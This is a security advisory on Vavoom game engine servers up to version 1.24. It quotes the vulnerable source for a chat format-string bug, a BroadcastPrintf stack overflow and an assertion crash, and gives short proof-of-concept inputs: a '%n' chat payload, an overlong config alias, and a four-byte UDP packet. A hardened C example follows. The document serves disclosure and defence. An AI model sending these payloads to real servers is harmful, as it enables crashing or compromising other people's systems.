#######################################################################

                             Luigi Auriemma

Application:  Vavoom
              http://www.vavoom-engine.com
Versions:     <= 1.24
Platforms:    Windows, DOS, *nix, *BSD and more
Bugs:         A] Say format string
              B] BroadcastPrintf buffer-overflow
              C] "NewLen >= 0" assertion failed
Exploitation: remote, versus server
Date:         23 Aug 2007
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Vavoom is an open source engine based on the GPLed Doom engine with
many interesting features.

#######################################################################

=======
2) Bugs
=======

--------------------
A] Say format string
--------------------

Format string vulnerability exploitable by sending a chat message: the
BroadcastPrintf function is called with a string containing the name of
the user plus his message as the format string itself, without a proper
format argument such as "%s".

from sv_main.cpp:

COMMAND(Say)
{
    guard(COMMAND Say);
    if (Source == SRC_Command)
    {
#ifdef CLIENT
        ForwardToServer();
#endif
        return;
    }

    if (Args.Num() < 2)
        return;

    VStr Text = Player->PlayerName;
    Text += ":";
    for (int i = 1; i < Args.Num(); i++)
    {
        Text += " ";
        Text += Args[i];
    }
    // user-controlled text is passed as the format string
    GLevelInfo->BroadcastPrintf(*Text);
    GLevelInfo->StartSound(TVec(0, 0, 0), 0,
        GSoundManager->GetSoundID("misc/chat"), 0, 1.0, 0);
    unguard;
}

----------------------------------
B] BroadcastPrintf buffer-overflow
----------------------------------

Buffer-overflow vulnerability located in the BroadcastPrintf function:
the formatted text is written with vsprintf into a fixed 1024-byte
stack buffer without any length check. The steps for exploiting it are
the same as for the previous bug.

from p_thinker.cpp:

void VThinker::BroadcastPrintf(const char *s, ...)
{
    guard(VThinker::BroadcastPrintf);
    va_list v;
    char buf[1024];

    va_start(v, s);
    // unbounded write into buf
    vsprintf(buf, s, v);
    va_end(v);

    for (int i = 0; i < svs.max_clients; i++)
        if (Level->Game->Players[i])
            Level->Game->Players[i]->eventClientPrint(buf);
    unguard;
}

---------------------------------
C] "NewLen >= 0" assertion failed
---------------------------------

A failed assert in the following function, reached for example when a
string with an invalid (negative) size is received, allows an attacker
to terminate the server.

from str.cpp:

void VStr::Resize(int NewLen)
{
    guard(VStr::Resize);
    check(NewLen >= 0);
    ...

#######################################################################

===========
3) The Code
===========

A] send a chat message containing %n%n%n%n%s

B] open the cfg file, for example vavoom\basev\doom2\config.cfg, and
   add the following lines:

   alias bof "say aaa...(992_'a's)...aaa"
   name "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

C] send a UDP packet (port 26000) containing the following hex bytes:

   80 02 ff 00

#######################################################################

======
4) Fix
======

I have sent a mail to the developer

#######################################################################
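The following is an added example, not Vavoom's code and not the fix the developer shipped; it shows the hardened pattern for all three bugs in plain C: a bounded, always-terminated BroadcastPrintf equivalent (vsnprintf instead of vsprintf), a Say equivalent that passes the player text only as a "%s" argument, and a Resize check that rejects a negative length instead of asserting. The names safe_broadcast_format, safe_say and safe_resize_check are hypothetical.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024   /* same buffer size as the original BroadcastPrintf */

/* Hypothetical hardened BroadcastPrintf: vsnprintf never writes past bufsz
   and always NUL-terminates; overlong output is truncated, not overflowed.
   Returns the number of bytes actually stored (excluding the NUL). */
size_t safe_broadcast_format(char *buf, size_t bufsz, const char *fmt, ...)
{
    va_list v;
    va_start(v, fmt);
    int n = vsnprintf(buf, bufsz, fmt, v);
    va_end(v);
    if (n < 0) {
        buf[0] = '\0';
        return 0;
    }
    return (size_t)n >= bufsz ? bufsz - 1 : (size_t)n;
}

/* Hypothetical hardened Say: the format string is a literal, player name
   and message are only ever arguments, so "%n" in the chat text is data. */
size_t safe_say(char *out, size_t outsz, const char *name, const char *msg)
{
    return safe_broadcast_format(out, outsz, "%s: %s", name, msg);
}

/* Hypothetical Resize guard: a negative or oversized length is rejected
   (returns 0) instead of aborting the server through check(). */
int safe_resize_check(int new_len, int max_len)
{
    return new_len >= 0 && new_len <= max_len;
}

/* Demo 1: the chat text from section 3 is rendered literally. Returns 1 on success. */
int demo_say_literal(void)
{
    char buf[BUF_SIZE];
    safe_say(buf, sizeof buf, "player", "%n%n%n%n%s");
    return strcmp(buf, "player: %n%n%n%n%s") == 0;
}

/* Demo 2: a 2000-byte message is truncated to fit. Returns the stored length. */
size_t demo_say_truncates(void)
{
    char msg[2001], buf[BUF_SIZE];
    memset(msg, 'a', 2000);          /* constructed oversize chat message */
    msg[2000] = '\0';
    return safe_say(buf, sizeof buf, "x", msg);
}
```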